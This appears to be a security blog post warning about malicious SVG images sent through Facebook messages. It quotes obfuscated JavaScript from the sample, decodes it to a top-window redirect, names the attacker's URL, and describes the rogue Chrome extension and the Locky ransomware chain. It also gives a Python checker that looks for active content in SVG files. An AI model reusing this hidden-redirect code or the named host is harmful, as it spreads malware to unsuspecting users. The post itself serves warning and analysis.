
Facebook SPAM Alert! – Malicious SVG File is Spreading through Facebook Messages



Have you received any kind of image file through Facebook messages lately?

If yes, is it in SVG format?

If it is, please don't click on it.

Facebook Spam in messages

Spammers have created a malicious image (an SVG file) that will make you install ransomware on your system and in turn infect most of your friends through the same medium, i.e. Facebook messages.

Scalable Vector Graphics (SVG) is an XML-based image format used to serve vector images. If you notice, our logo is also in SVG format. You can download and inspect it by opening the file in a text editor.

The reason the spammers use SVG images for spamming is that the format allows dynamic content. The spammers had included malicious JavaScript code right inside the image itself, which in this case was a link to an external file which would in turn download Locky ransomware.
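Because the danger comes from the active content an SVG may carry, an attachment can be checked for it before anyone opens it. The Python below is an added example, not code from the original post; the function name `svg_active_content`, the list of tags it treats as active, and the two sample SVG strings are assumptions constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

# Elements that can run or load code inside an SVG (assumed list for this example).
ACTIVE_TAGS = {"script", "foreignobject", "iframe", "embed", "object"}
URL_ATTRS = {"href", "src"}

def local(name):
    """Strip the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1].lower()

def svg_active_content(svg_text):
    """Return a sorted list of findings describing active content in an SVG."""
    # Do not parse DTDs: entity definitions can hide content or exhaust the parser.
    if re.search(r"<!DOCTYPE|<!ENTITY", svg_text, re.I):
        return ["doctype-or-entity"]
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError:
        return ["unparseable"]
    findings = set()
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_TAGS:
            findings.add(f"element:{tag}")
        for attr, value in el.attrib.items():
            name = local(attr)
            if name.startswith("on"):  # onload, onclick, ...
                findings.add(f"handler:{name}")
            if name in URL_ATTRS and re.match(r"\s*javascript:", value, re.I):
                findings.add(f"url:{name}")
    return sorted(findings)

# Constructed samples: a plain drawing and one carrying script, a handler and a JS link.
CLEAN = '<svg xmlns="http://www.w3.org/2000/svg"><circle r="5"/></svg>'
SCRIPTED = (
    '<svg xmlns="http://www.w3.org/2000/svg" onload="init()">'
    '<script type="text/javascript"><![CDATA[var w = window;]]></script>'
    '<a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:void(0)">'
    '<circle r="5"/></a></svg>'
)

if __name__ == "__main__":
    for label, sample in (("clean", CLEAN), ("scripted", SCRIPTED)):
        print(label, svg_active_content(sample))
```

An empty list means no active content was found; any finding is a reason to treat the file as a document that can execute code, not as a picture.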

What happens if you click that spam image?

You can check out the SVG file's code here:

http://pastebin.com/Ma5t0Fj0

If you look at the SVG file on Pastebin, observe lines 48 to 51:

var hdekw = window;

var ljfji = bxtqxbl("q2wzN=IFPjjmkiEFlo",15,true);

var pryyb = bxtqxbl("xXnDUGnKZcx?URbam",9,false);

var lpvxzt = bxtqxbl("nso6/z",2,false);

hdekw[ljfji][pryyb][lpvxzt] = bxtqxbl("6DK_Ezq4ACorNFc5h9IiELr0p97DN5nBKwAL2FmFOkdrDFeG",10,true);

The spammers have cleverly used cryptographic techniques to bypass Facebook's file checkers and then execute a window function.

If you log these variables in the console:

console.log(ljfji);

console.log(pryyb);

console.log(lpvxzt);

console.log(bxtqxbl("6DK_Ezq4ACorNFc5h9IiELr0p97DN5nBKwAL2FmFOkdrDFeG",10,true));

You would get this:

top

location

href

http://mourid.com/php/trust.php

Clearly, the malicious SVG file is trying to redirect you to http://mourid.com/php/trust.php, which happens to be a fake YouTube video page that will force you to install a malicious Chrome extension.

Facebook spam in SVG file

Once the extension is installed, it takes advantage of your browser's access to your Facebook account to secretly spam your friends with the same SVG image file, helping the spam spread further.

In addition, the extension also downloads the "Nemucod downloader", which is a generic malware downloader generally used to fetch and install various ransomware. In this case the malware downloader downloads "Locky ransomware", leaving your system locked.

You can read more about ransomware in my previous post on the rise of malicious JavaScript.